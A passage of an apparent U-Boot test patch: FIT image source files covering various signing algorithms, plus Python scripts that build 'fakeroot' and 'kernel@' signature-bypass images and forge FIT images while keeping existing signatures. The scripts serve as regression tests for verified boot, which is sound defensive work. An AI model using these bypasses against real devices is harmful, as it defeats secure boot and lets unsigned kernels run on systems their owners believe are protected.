}; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss-prod.its b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its new file mode 100644 index 00000000000..aac732e304c --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "prod"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss.its b/test/py/tests/vboot/sign-configs-sha256-pss.its new file mode 100644 index 00000000000..7bdcc7e286f --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256.its b/test/py/tests/vboot/sign-configs-sha256.its new file mode 100644 index 00000000000..f5591aad305 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha384.its b/test/py/tests/vboot/sign-configs-sha384.its new file mode 100644 index 00000000000..2869401991e --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha384.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha384"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha384"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-algo-arg.its b/test/py/tests/vboot/sign-images-algo-arg.its new file mode 100644 index 00000000000..9144c8b5ad8 --- /dev/null +++ b/test/py/tests/vboot/sign-images-algo-arg.its @@ -0,0 +1,40 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1-pss.its b/test/py/tests/vboot/sign-images-sha1-pss.its new file mode 100644 index 00000000000..ded7ae4f552 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1.its b/test/py/tests/vboot/sign-images-sha1.its new file mode 100644 index 00000000000..18c759e9e65 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256-pss.its b/test/py/tests/vboot/sign-images-sha256-pss.its new file mode 100644 index 00000000000..34850cc6c58 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256.its b/test/py/tests/vboot/sign-images-sha256.its new file mode 100644 index 00000000000..bb0f8ee8a66 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha384.its b/test/py/tests/vboot/sign-images-sha384.its new file mode 100644 index 00000000000..be1a9a653c7 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha384.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/simple-images.its b/test/py/tests/vboot/simple-images.its new file mode 100644 index 00000000000..f62786456b8 --- /dev/null +++ b/test/py/tests/vboot/simple-images.its @@ -0,0 +1,36 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot_evil.py b/test/py/tests/vboot_evil.py new file mode 100644 index 00000000000..e2b0cd65468 --- /dev/null +++ b/test/py/tests/vboot_evil.py @@ -0,0 +1,486 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, Intel Corporation + +"""Modifies a devicetree to add a fake root node, for testing purposes""" + +import hashlib +import struct +import sys + +FDT_PROP = 0x3 +FDT_BEGIN_NODE = 0x1 +FDT_END_NODE = 0x2 +FDT_END = 0x9 + +FAKE_ROOT_ATTACK = 0 +KERNEL_AT = 1 + +MAGIC = 0xd00dfeed + +EVIL_KERNEL_NAME = b'evil_kernel' +FAKE_ROOT_NAME = b'f@keroot' + + +def getstr(dt_strings, off): + """Get a string from the devicetree string table + + Args: + dt_strings (bytes): Devicetree strings section + off (int): Offset of string to read + + Returns: + str: String read from the table + """ + output = '' + while dt_strings[off]: + output += chr(dt_strings[off]) + off += 1 + + return output + + +def align(offset): + """Align an offset to a multiple of 4 + + Args: + offset (int): Offset to align + + Returns: + int: Resulting aligned offset (rounds up to nearest multiple) + """ + return (offset + 3) & ~3 + + +def determine_offset(dt_struct, dt_strings, searched_node_name): + """Determines the offset of an element, either a node or a property + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + searched_node_name (str): element path, ex: /images/kernel@1/data + + Returns: + tuple: (node start offset, node end offset) + if element is not found, returns (None, None) + """ + offset = 0 + depth = -1 + + path = '/' + + object_start_offset = None + object_end_offset = None + object_depth = None + + while offset < len(dt_struct): + (tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + if tag == FDT_BEGIN_NODE: + depth += 1 + + begin_node_offset = offset + offset += 4 + + node_name = getstr(dt_struct, offset) + offset += len(node_name) + 1 + offset = align(offset) + + if path[-1] != '/': + path += '/' + + path += str(node_name) + + if path == searched_node_name: + object_start_offset = begin_node_offset + object_depth = depth + + elif tag == FDT_PROP: + begin_prop_offset = offset + + offset += 4 + len_tag, nameoff = struct.unpack('>II', + dt_struct[offset:offset + 8]) + offset += 8 + prop_name = getstr(dt_strings, nameoff) + + len_tag = align(len_tag) + + offset += len_tag + + node_path = path + '/' + str(prop_name) + + if node_path == searched_node_name: + object_start_offset = begin_prop_offset + + elif tag == FDT_END_NODE: + offset += 4 + + path = path[:path.rfind('/')] + if not path: + path = '/' + + if depth == object_depth: + object_end_offset = offset + break + depth -= 1 + elif tag == FDT_END: + break + + else: + print('unknown tag=0x%x, offset=0x%x found!' % (tag, offset)) + break + + return object_start_offset, object_end_offset + + +def modify_node_name(dt_struct, node_offset, replcd_name): + """Change the name of a node + + Args: + dt_struct (bytes): Devicetree struct section + node_offset (int): Offset of node + replcd_name (str): New name for node + + Returns: + bytes: New dt_struct contents + """ + + # skip 4 bytes for the FDT_BEGIN_NODE + node_offset += 4 + + node_name = getstr(dt_struct, node_offset) + node_name_len = len(node_name) + 1 + + node_name_len = align(node_name_len) + + replcd_name += b'\0' + + # align on 4 bytes + while len(replcd_name) % 4: + replcd_name += b'\0' + + dt_struct = (dt_struct[:node_offset] + replcd_name + + dt_struct[node_offset + node_name_len:]) + + return dt_struct + + +def modify_prop_content(dt_struct, prop_offset, content): + """Overwrite the value of a property + + Args: + dt_struct (bytes): Devicetree struct section + prop_offset (int): Offset of property (FDT_PROP tag) + content (bytes): New content for the property + + Returns: + bytes: New dt_struct contents + """ + # skip FDT_PROP + prop_offset += 4 + (len_tag, nameoff) = struct.unpack('>II', + dt_struct[prop_offset:prop_offset + 8]) + + # compute padded original node length + original_node_len = len_tag + 8 # content length + prop meta data len + + original_node_len = align(original_node_len) + + added_data = struct.pack('>II', len(content), nameoff) + added_data += content + while len(added_data) % 4: + added_data += b'\0' + + dt_struct = (dt_struct[:prop_offset] + added_data + + dt_struct[prop_offset + original_node_len:]) + + return dt_struct + + +def change_property_value(dt_struct, dt_strings, prop_path, prop_value, + required=True): + """Change a given property value + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + prop_value (bytes): new property name + required (bool): raise an exception if property not found + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the property is not found + """ + (rt_node_start, _) = determine_offset(dt_struct, dt_strings, prop_path) + if rt_node_start is None: + if not required: + return dt_struct + raise ValueError('Fatal error, unable to find prop %s' % prop_path) + + dt_struct = modify_prop_content(dt_struct, rt_node_start, prop_value) + + return dt_struct + +def change_node_name(dt_struct, dt_strings, node_path, node_name): + """Change a given node name + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + node_path (str): full path of the target node + node_name (str): new node name, just node name not full path + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the node is not found + """ + (rt_node_start, rt_node_end) = ( + determine_offset(dt_struct, dt_strings, node_path)) + if rt_node_start is None or rt_node_end is None: + raise ValueError('Fatal error, unable to find root node') + + dt_struct = modify_node_name(dt_struct, rt_node_start, node_name) + + return dt_struct + +def get_prop_value(dt_struct, dt_strings, prop_path): + """Get the content of a property based on its path + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + + Returns: + bytes: Property value + + Raises: + ValueError: if the property is not found + """ + (offset, _) = determine_offset(dt_struct, dt_strings, prop_path) + if offset is None: + raise ValueError('Fatal error, unable to find prop') + + offset += 4 + (len_tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + offset += 8 + tag_data = dt_struct[offset:offset + len_tag] + + return tag_data + + +def kernel_at_attack(dt_struct, dt_strings, kernel_content, kernel_hash): + """Conduct the kernel@ attack + + It fetches from /configurations/default the name of the kernel being loaded. + Then, if the kernel name does not contain any @sign, duplicates the kernel + in /images node and appends '@evil' to its name. + It inserts a new kernel content and updates its images digest. + + Inputs: + - FIT dt_struct + - FIT dt_strings + - kernel content blob + - kernel hash blob + + Important note: it assumes the U-Boot loading method is 'kernel' and the + loaded kernel hash's subnode name is 'hash-1' + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/' + default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + if loaded_kernel.find('@') != -1: + print('kernel@ attack does not work on nodes already containing an @ sign!') + sys.exit() + + # determine boundaries of the loaded kernel + (krn_node_start, krn_node_end) = (determine_offset( + dt_struct, dt_strings, '/images/' + loaded_kernel)) + if krn_node_start is None and krn_node_end is None: + print('Fatal error, unable to find root node') + sys.exit() + + # copy the loaded kernel + loaded_kernel_copy = dt_struct[krn_node_start:krn_node_end] + + # insert the copy inside the tree + dt_struct = dt_struct[:krn_node_start] + \ + loaded_kernel_copy + dt_struct[krn_node_start:] + + evil_kernel_name = loaded_kernel+'@evil' + + # change the inserted kernel name + dt_struct = change_node_name( + dt_struct, dt_strings, '/images/' + loaded_kernel, bytes(evil_kernel_name, 'utf-8')) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/data', kernel_content) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/hash-1/value', kernel_hash) + + return dt_struct + + +def fake_root_node_attack(dt_struct, dt_strings, kernel_content, kernel_digest): + """Conduct the fakenode attack + + It duplicates the original root node at the beginning of the tree. + Then it modifies within this duplicated tree: + - The loaded kernel name + - The loaded kernel data + + Important note: it assumes the UBoot loading method is 'kernel' and the loaded kernel + hash's subnode name is hash@1 + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/'+default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + # determine root node start and end: + (rt_node_start, rt_node_end) = (determine_offset(dt_struct, dt_strings, '/')) + if (rt_node_start is None) or (rt_node_end is None): + print('Fatal error, unable to find root node') + sys.exit() + + # duplicate the whole tree + duplicated_node = dt_struct[rt_node_start:rt_node_end] + + # dchange root name (empty name) to fake root name + new_dup = change_node_name(duplicated_node, dt_strings, '/', FAKE_ROOT_NAME) + + dt_struct = new_dup + dt_struct + + # change the value of /<fake_root_name>/configs/<default_config_name>/kernel + # so our modified kernel will be loaded + base = '/' + str(FAKE_ROOT_NAME, 'utf-8') + value_path = base + conf_path+'/kernel' + dt_struct = change_property_value(dt_struct, dt_strings, value_path, + EVIL_KERNEL_NAME + b'\0') + + # change the node of the /<fake_root_name>/images/<original_kernel_name> + images_path = base + '/images/' + node_path = images_path + loaded_kernel + dt_struct = change_node_name(dt_struct, dt_strings, node_path, + EVIL_KERNEL_NAME) + + # change the content of the kernel being loaded + data_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/data' + dt_struct = change_property_value(dt_struct, dt_strings, data_path, + kernel_content, required=False) + + # update the digest value + hash_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/hash-1/value' + dt_struct = change_property_value(dt_struct, dt_strings, hash_path, + kernel_digest) + + return dt_struct + +def add_evil_node(in_fname, out_fname, kernel_fname, attack): + """Add an evil node to the devicetree + + Args: + in_fname (str): Filename of input devicetree + out_fname (str): Filename to write modified devicetree to + kernel_fname (str): Filename of kernel data to add to evil node + attack (str): Attack type ('fakeroot' or 'kernel@') + + Raises: + ValueError: Unknown attack name + """ + if attack == 'fakeroot': + attack = FAKE_ROOT_ATTACK + elif attack == 'kernel@': + attack = KERNEL_AT + else: + raise ValueError('Unknown attack name!') + + with open(in_fname, 'rb') as fin: + input_data = fin.read() + + hdr = input_data[0:0x28] + + offset = 0 + magic = struct.unpack('>I', hdr[offset:offset + 4])[0] + if magic != MAGIC: + raise ValueError('Wrong magic!') + + offset += 4 + (totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) = struct.unpack('>IIIIIIIII', hdr[offset:offset + 36]) + + rsv_map = input_data[off_mem_rsvmap:off_dt_struct] + dt_struct = input_data[off_dt_struct:off_dt_struct + size_dt_struct] + dt_strings = input_data[off_dt_strings:off_dt_strings + size_dt_strings] + + with open(kernel_fname, 'rb') as kernel_file: + kernel_content = kernel_file.read() + + # computing inserted kernel hash + val = hashlib.sha1() + val.update(kernel_content) + hash_digest = val.digest() + + if attack == FAKE_ROOT_ATTACK: + dt_struct = fake_root_node_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + elif attack == KERNEL_AT: + dt_struct = kernel_at_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + + # now rebuild the new file + size_dt_strings = len(dt_strings) + size_dt_struct = len(dt_struct) + totalsize = 0x28 + len(rsv_map) + size_dt_struct + size_dt_strings + off_mem_rsvmap = 0x28 + off_dt_struct = off_mem_rsvmap + len(rsv_map) + off_dt_strings = off_dt_struct + len(dt_struct) + + header = struct.pack('>IIIIIIIIII', MAGIC, totalsize, off_dt_struct, + off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) + + with open(out_fname, 'wb') as output_file: + output_file.write(header) + output_file.write(rsv_map) + output_file.write(dt_struct) + output_file.write(dt_strings) + +if __name__ == '__main__': + if len(sys.argv) != 5: + print('usage: %s <input_filename> <output_filename> <kernel_binary> <attack_name>' % + sys.argv[0]) + print('valid attack names: [fakeroot, kernel@]') + sys.exit(1) + + in_fname, out_fname, kernel_fname, attack = sys.argv[1:] + add_evil_node(in_fname, out_fname, kernel_fname, attack) diff --git a/test/py/tests/vboot_forge.py b/test/py/tests/vboot_forge.py new file mode 100644 index 00000000000..b41105bd0e3 --- /dev/null +++ b/test/py/tests/vboot_forge.py @@ -0,0 +1,423 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, F-Secure Corporation, https://foundry.f-secure.com +# +# pylint: disable=E1101,W0201,C0103 + +""" +Verified boot image forgery tools and utilities + +This module provides services to both take apart and regenerate FIT images +in a way that preserves all existing verified boot signatures, unless you +manipulate nodes in the process. +""" + +import struct +import binascii +from io import BytesIO + +# +# struct parsing helpers +# + +class BetterStructMeta(type): + """ + Preprocesses field definitions and creates a struct.Struct instance from them + """ + def __new__(cls, clsname, superclasses, attributedict): + if clsname != 'BetterStruct': + fields = attributedict['__fields__'] + field_types = [_[0] for _ in fields] + field_names = [_[1] for _ in fields if _[1] is not None] + attributedict['__names__'] = field_names + s = struct.Struct(attributedict.get('__endian__', '') + ''.join(field_types)) + attributedict['__struct__'] = s + attributedict['size'] = s.size + return type.__new__(cls, clsname, superclasses, attributedict) + +class BetterStruct(metaclass=BetterStructMeta): + """ + Base class for better structures + """ + def __init__(self): + for t, n in self.__fields__: + if 's' in t: + setattr(self, n, '') + elif t in ('Q', 'I', 'H', 'B'): + setattr(self, n, 0) + + @classmethod + def unpack_from(cls, buffer, offset=0): + """ + Unpack structure instance from a buffer + """ + fields = cls.__struct__.unpack_from(buffer, offset) + instance = cls() + for n, v in zip(cls.__names__, fields): + setattr(instance, n, v) + return instance + + def pack(self): + """ + Pack structure instance into bytes + """ + return self.__struct__.pack(*[getattr(self, n) for n in self.__names__]) + + def __str__(self): + items = ["'%s': %s" % (n, repr(getattr(self, n))) for n in self.__names__ if n is not None] + return '(' + ', '.join(items) + ')' + +# +# some defs for flat DT data +# + +class HeaderV17(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'magic'), + ('I', 'totalsize'), + ('I', 'off_dt_struct'), + ('I', 'off_dt_strings'), + ('I', 'off_mem_rsvmap'), + ('I', 'version'), + ('I', 'last_comp_version'), + ('I', 'boot_cpuid_phys'), + ('I', 'size_dt_strings'), + ('I', 'size_dt_struct'), + ] + +class RRHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('Q', 'address'), + ('Q', 'size'), + ] + +class PropHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'value_size'), + ('I', 'name_offset'), + ] + +# magical constants for DTB format +OF_DT_HEADER = 0xd00dfeed +OF_DT_BEGIN_NODE = 1 +OF_DT_END_NODE = 2 +OF_DT_PROP = 3 +OF_DT_END = 9 + +class StringsBlock: + """ + Represents a parsed device tree string block + """ + def __init__(self, values=None): + if values is None: + self.values = [] + else: + self.values = values + + def __getitem__(self, at): + if isinstance(at, str): + offset = 0 + for value in self.values: + if value == at: + break + offset += len(value) + 1 + else: + self.values.append(at) + return offset + + if isinstance(at, int): + offset = 0 + for value in self.values: + if offset == at: + return value + offset += len(value) + 1 + raise IndexError('no string found corresponding to the given offset') + + raise TypeError('only strings and integers are accepted') + +class Prop: + """ + Represents a parsed device tree property + """ + def __init__(self, name=None, value=None): + self.name = name + self.value = value + + def clone(self): + return Prop(self.name, self.value) + + def __repr__(self): + return "<Prop(name='%s', value=%s>" % (self.name, repr(self.value)) + +class Node: + """ + Represents a parsed device tree node + """ + def __init__(self, name=None): + self.name = name + self.props = [] + self.children = [] + + def clone(self): + o = Node(self.name) + o.props = [x.clone() for x in self.props] + o.children = [x.clone() for x in self.children] + return o + + def __getitem__(self, index): + return self.children[index] + + def __repr__(self): + return "<Node('%s'), %s, %s>" % (self.name, repr(self.props), repr(self.children)) + +# +# flat DT to memory +# + +def parse_strings(strings): + """ + Converts the bytes into a StringsBlock instance so it is convenient to work with + """ + strings = strings.split(b'\x00') + return StringsBlock(strings) + +def parse_struct(stream): + """ + Parses DTB structure(s) into a Node or Prop instance + """ + tag = bytearray(stream.read(4))[3] + if tag == OF_DT_BEGIN_NODE: + name = b'' + while b'\x00' not in name: + name += stream.read(4) + name = name.rstrip(b'\x00') + node = Node(name) + + item = parse_struct(stream) + while item is not None: + if isinstance(item, Node): + node.children.append(item) + elif isinstance(item, Prop): + node.props.append(item) + item = parse_struct(stream) + + return node + + if tag == OF_DT_PROP: + h = PropHeader.unpack_from(stream.read(PropHeader.size)) + length = (h.value_size + 3) & (~3) + value = stream.read(length)[:h.value_size] + prop = Prop(h.name_offset, value) + return prop + + if tag in (OF_DT_END_NODE, OF_DT_END): + return None + + raise ValueError('unexpected tag value') + +def read_fdt(fp): + """ + Reads and parses the flattened device tree (or derivatives like FIT) + """ + header = HeaderV17.unpack_from(fp.read(HeaderV17.size)) + if header.magic != OF_DT_HEADER: + raise ValueError('invalid magic value %08x; expected %08x' % (header.magic, OF_DT_HEADER)) + # TODO: read/parse reserved regions + fp.seek(header.off_dt_struct) + structs = fp.read(header.size_dt_struct) + fp.seek(header.off_dt_strings) + strings = fp.read(header.size_dt_strings) + strblock = parse_strings(strings) + root = parse_struct(BytesIO(structs)) + + return root, strblock + +# +# memory to flat DT +# + +def compose_structs_r(item): + """ + Recursive part of composing Nodes and Props into a bytearray + """ + t = bytearray() + + if isinstance(item, Node): + t.extend(struct.pack('>I', OF_DT_BEGIN_NODE)) + if isinstance(item.name, str): + item.name = bytes(item.name, 'utf-8') + name = item.name + b'\x00' + if len(name) & 3: + name += b'\x00' * (4 - (len(name) & 3)) + t.extend(name) + for p in item.props: + t.extend(compose_structs_r(p)) + for c in item.children: + t.extend(compose_structs_r(c)) + t.extend(struct.pack('>I', OF_DT_END_NODE)) + + elif isinstance(item, Prop): + t.extend(struct.pack('>I', OF_DT_PROP)) + value = item.value + h = PropHeader() + h.name_offset = item.name + if value: + h.value_size = len(value) + t.extend(h.pack()) + if len(value) & 3: + value += b'\x00' * (4 - (len(value) & 3)) + t.extend(value) + else: + h.value_size = 0 + t.extend(h.pack()) + + return t + +def compose_structs(root): + """ + Composes the parsed Nodes into a flat bytearray instance + """ + t = compose_structs_r(root) + t.extend(struct.pack('>I', OF_DT_END)) + return t + +def compose_strings(strblock): + """ + Composes the StringsBlock instance back into a bytearray instance + """ + b = bytearray() + for s in strblock.values: + b.extend(s) + b.append(0) + return bytes(b) + +def write_fdt(root, strblock, fp): + """ + Writes out a complete flattened device tree (or FIT) + """ + header = HeaderV17() + header.magic = OF_DT_HEADER + header.version = 17 + header.last_comp_version = 16 + fp.write(header.pack()) + + header.off_mem_rsvmap = fp.tell() + fp.write(RRHeader().pack()) + + structs = compose_structs(root) + header.off_dt_struct = fp.tell() + header.size_dt_struct = len(structs) + 